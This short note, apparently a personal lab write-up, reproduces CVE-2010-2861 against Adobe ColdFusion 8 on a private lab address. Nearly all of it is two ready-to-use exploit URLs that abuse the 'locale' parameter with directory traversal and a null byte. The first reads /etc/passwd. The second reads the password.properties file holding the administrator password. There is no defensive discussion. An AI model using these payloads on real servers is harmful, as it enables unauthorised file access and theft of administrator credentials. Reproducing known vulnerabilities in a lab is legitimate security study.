cve-2010-2861
2023-02-23 11:31:00
cve-2010-2861
Harm version
1 | Adobe ColdFusion 8 |
Init
url:http://172.16.40.142:8500/CFIDE/administrator/index.cfm
Run poc(开无痕体验感更佳)
Url
1 | http://172.16.40.142:8500/CFIDE/administrator/index.cfm?locale=../../../../../../../../../../etc/passwd%00en |
Cat web admin pwd
url
1 | http://172.16.40.142:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en |
